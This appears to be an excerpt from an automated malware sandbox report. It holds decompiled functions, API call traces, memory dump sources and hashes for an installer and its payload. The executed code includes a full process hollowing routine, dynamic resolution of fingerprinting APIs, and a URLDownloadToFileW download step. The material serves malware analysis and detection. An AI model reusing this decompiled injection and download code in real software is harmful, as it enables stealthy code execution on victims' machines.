                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-224404859
                                                                                • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                                                • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E6F7110E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				char* _t17;
                                                                                				char _t19;
                                                                                				void* _t20;
                                                                                				void* _t24;
                                                                                				void* _t27;
                                                                                				void* _t31;
                                                                                				void* _t37;
                                                                                				void* _t39;
                                                                                				void* _t40;
                                                                                				signed int _t43;
                                                                                				void* _t52;
                                                                                				char* _t53;
                                                                                				char* _t55;
                                                                                				void* _t56;
                                                                                				void* _t58;
                                                                                
                                                                                				 *0x6f71405c = _a8;
                                                                                				 *0x6f714060 = _a16;
                                                                                				 *0x6f714064 = _a12;
                                                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x6f714038, E6F711556, _t52);
                                                                                				_t43 =  *0x6f71405c +  *0x6f71405c * 4 << 2;
                                                                                				_t17 = E6F71123B();
                                                                                				_a8 = _t17;
                                                                                				_t53 = _t17;
                                                                                				if( *_t17 == 0) {
                                                                                					L16:
                                                                                					return GlobalFree(_a8);
                                                                                				} else {
                                                                                					do {
                                                                                						_t19 =  *_t53;
                                                                                						_t55 = _t53 + 1;
                                                                                						_t58 = _t19 - 0x6c;
                                                                                						if(_t58 > 0) {
                                                                                							_t20 = _t19 - 0x70;
                                                                                							if(_t20 == 0) {
                                                                                								L12:
                                                                                								_t53 = _t55 + 1;
                                                                                								_t24 = E6F711266(E6F7112AD( *_t55 - 0x30));
                                                                                								L13:
                                                                                								GlobalFree(_t24);
                                                                                								goto L14;
                                                                                							}
                                                                                							_t27 = _t20;
                                                                                							if(_t27 == 0) {
                                                                                								L10:
                                                                                								_t53 = _t55 + 1;
                                                                                								_t24 = E6F7112D1( *_t55 - 0x30, E6F71123B());
                                                                                								goto L13;
                                                                                							}
                                                                                							L7:
                                                                                							if(_t27 == 1) {
                                                                                								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                                                								 *_t31 =  *0x6f714030;
                                                                                								 *0x6f714030 = _t31;
                                                                                								E6F711508(_t31 + 4,  *0x6f714064, _t43);
                                                                                								_t56 = _t56 + 0xc;
                                                                                							}
                                                                                							goto L14;
                                                                                						}
                                                                                						if(_t58 == 0) {
                                                                                							L17:
                                                                                							_t34 =  *0x6f714030;
                                                                                							if( *0x6f714030 != 0) {
                                                                                								E6F711508( *0x6f714064, _t34 + 4, _t43);
                                                                                								_t37 =  *0x6f714030;
                                                                                								_t56 = _t56 + 0xc;
                                                                                								GlobalFree(_t37);
                                                                                								 *0x6f714030 =  *_t37;
                                                                                							}
                                                                                							goto L14;
                                                                                						}
                                                                                						_t39 = _t19 - 0x4c;
                                                                                						if(_t39 == 0) {
                                                                                							goto L17;
                                                                                						}
                                                                                						_t40 = _t39 - 4;
                                                                                						if(_t40 == 0) {
                                                                                							 *_t55 =  *_t55 + 0xa;
                                                                                							goto L12;
                                                                                						}
                                                                                						_t27 = _t40;
                                                                                						if(_t27 == 0) {
                                                                                							 *_t55 =  *_t55 + 0xa;
                                                                                							goto L10;
                                                                                						}
                                                                                						goto L7;
                                                                                						L14:
                                                                                					} while ( *_t53 != 0);
                                                                                					goto L16;
                                                                                				}
                                                                                			}



















                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                • Opcode ID: fb6216d9d71e89c6e998fad362c17edcdc565aae6eaabbc827570bfb964dd2ee
                                                                                • Instruction ID: 2b6d16b6eecbd24920398a46619779e380065eabaa6d80e36ad13868d84f47a2
                                                                                • Opcode Fuzzy Hash: fb6216d9d71e89c6e998fad362c17edcdc565aae6eaabbc827570bfb964dd2ee
                                                                                • Instruction Fuzzy Hash: 1B319EB150C644AFEB00CF69EB4AA65BFFDFB57264B1C0177E844CA150D7B49918AB20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                				int _v8;
                                                                                				int _t12;
                                                                                				int _t14;
                                                                                				int _t15;
                                                                                				CHAR* _t17;
                                                                                				CHAR* _t27;
                                                                                
                                                                                				_t12 = lstrlenA(_a8);
                                                                                				_t27 = _a4;
                                                                                				_v8 = _t12;
                                                                                				while(lstrlenA(_t27) >= _v8) {
                                                                                					_t14 = _v8;
                                                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                                                					_t27[_v8] =  *(_t14 + _t27);
                                                                                					if(_t15 == 0) {
                                                                                						_t17 = _t27;
                                                                                					} else {
                                                                                						_t27 = CharNextA(_t27);
                                                                                						continue;
                                                                                					}
                                                                                					L5:
                                                                                					return _t17;
                                                                                				}
                                                                                				_t17 = 0;
                                                                                				goto L5;
                                                                                			}










                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                                • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                                • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
                                                                                • SetEvent.KERNEL32(?), ref: 0040D2C5
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6D195DF0), ref: 0040D2E8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • GetTickCount.KERNEL32 ref: 0040D33C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                                                                • atoi.MSVCRT ref: 0040D47B
                                                                                • Sleep.KERNEL32(00000064), ref: 0040DD60
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                                                                • String ID: $$PowrProf.dll$SetSuspendState
                                                                                • API String ID: 2465730144-1158640710
                                                                                • Opcode ID: 2d3800b21f02be87d81d1f3b08866a964c080d7525b95067cc5a73a19eea0ae7
                                                                                • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                                                                • Opcode Fuzzy Hash: 2d3800b21f02be87d81d1f3b08866a964c080d7525b95067cc5a73a19eea0ae7
                                                                                • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409908() {
                                                                                				struct HINSTANCE__* _t1;
                                                                                				_Unknown_base(*)()* _t2;
                                                                                				_Unknown_base(*)()* _t22;
                                                                                
                                                                                				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                                                                				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                                                                				 *0x41bc94 = _t2;
                                                                                				if(_t2 == 0) {
                                                                                					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                                                                				}
                                                                                				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                                                                				if( *0x41bc94 == 0) {
                                                                                					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                                                                				}
                                                                                				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                                                                				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                                				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                                                                				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                                                                				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                                                                				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                                                                				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                                                                				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                                                                				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                                                                				 *0x41bc9c = _t22;
                                                                                				return _t22;
                                                                                			}







                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                                                                • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                                                                • API String ID: 551388010-2914448473
                                                                                • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                                                                • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                                                                • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                                                                • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0040F219() {
                                                                                				void* _t59;
                                                                                				void* _t60;
                                                                                				int _t64;
                                                                                				CONTEXT* _t65;
                                                                                				int _t66;
                                                                                				int _t70;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				int _t73;
                                                                                				signed int _t74;
                                                                                				int _t79;
                                                                                				CONTEXT* _t80;
                                                                                				int _t81;
                                                                                				long _t82;
                                                                                				intOrPtr _t85;
                                                                                				intOrPtr* _t93;
                                                                                				signed int _t95;
                                                                                				void* _t100;
                                                                                				CONTEXT* _t110;
                                                                                				struct _PROCESS_INFORMATION* _t114;
                                                                                				void* _t115;
                                                                                				void* _t117;
                                                                                
                                                                                				L00413ECA();
                                                                                				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
                                                                                				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                                                                				_t59 =  *(_t115 + 0xc);
                                                                                				 *(_t115 - 0x74) = _t59;
                                                                                				if( *_t59 != 0x5a4d) {
                                                                                					L16:
                                                                                					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                                                                					_t60 = 0;
                                                                                				} else {
                                                                                					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
                                                                                					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
                                                                                					if( *_t93 != 0x4550) {
                                                                                						goto L16;
                                                                                					} else {
                                                                                						_t95 = 0x11;
                                                                                						memset(_t115 - 0x60, 0, _t95 << 2);
                                                                                						_t114 =  *(_t115 + 0x10);
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						_t64 = CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114); // executed
                                                                                						if(_t64 == 0) {
                                                                                							goto L16;
                                                                                						} else {
                                                                                							_t65 = VirtualAlloc(0, 4, 0x1000, 4); // executed
                                                                                							_t110 = _t65;
                                                                                							 *(_t115 - 0x70) = _t110;
                                                                                							_t110->ContextFlags = 0x10007;
                                                                                							_t66 = GetThreadContext(_t114->hThread, _t110); // executed
                                                                                							if(_t66 == 0) {
                                                                                								goto L16;
                                                                                							} else {
                                                                                								_t70 = ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0); // executed
                                                                                								if(_t70 == 0) {
                                                                                									goto L16;
                                                                                								} else {
                                                                                									_t71 =  *(_t115 - 0x1c);
                                                                                									if(_t71 ==  *(_t93 + 0x34)) {
                                                                                										NtUnmapViewOfSection(_t114->hProcess, _t71);
                                                                                									}
                                                                                									_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40); // executed
                                                                                									 *(_t115 - 0x6c) = _t72;
                                                                                									if(_t72 == 0) {
                                                                                										goto L16;
                                                                                									} else {
                                                                                										_t73 = WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0); // executed
                                                                                										if(_t73 == 0) {
                                                                                											goto L16;
                                                                                										} else {
                                                                                											_t74 = 0;
                                                                                											 *(_t115 - 0x64) = 0;
                                                                                											while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
                                                                                												_t100 =  *(_t115 + 0xc);
                                                                                												_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
                                                                                												 *((intOrPtr*)(_t115 - 0x68)) = _t85;
                                                                                												WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0); // executed
                                                                                												 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
                                                                                												_t74 =  *(_t115 - 0x64);
                                                                                											}
                                                                                											_t79 = WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0); // executed
                                                                                											if(_t79 == 0) {
                                                                                												goto L16;
                                                                                											} else {
                                                                                												_t80 =  *(_t115 - 0x70);
                                                                                												_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
                                                                                												_t81 = SetThreadContext(_t114->hThread, _t80); // executed
                                                                                												if(_t81 == 0) {
                                                                                													goto L16;
                                                                                												} else {
                                                                                													_t82 = ResumeThread(_t114->hThread); // executed
                                                                                													if(_t82 == 0xffffffff) {
                                                                                														goto L16;
                                                                                													} else {
                                                                                														_t60 = 1;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
                                                                                				return _t60;
                                                                                			}

























                                                                                0x0040f39e
                                                                                0x0040f3a1
                                                                                0x0040f3ab
                                                                                0x0040f3b3
                                                                                0x00000000
                                                                                0x0040f3b5
                                                                                0x0040f3b8
                                                                                0x0040f3c1
                                                                                0x00000000
                                                                                0x0040f3c3
                                                                                0x0040f3c3
                                                                                0x0040f3c3
                                                                                0x0040f3c1
                                                                                0x0040f3b3
                                                                                0x0040f396
                                                                                0x0040f334
                                                                                0x0040f319
                                                                                0x0040f2eb
                                                                                0x0040f2c9
                                                                                0x0040f29c
                                                                                0x0040f269
                                                                                0x0040f3d0
                                                                                0x0040f3db

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040F21E
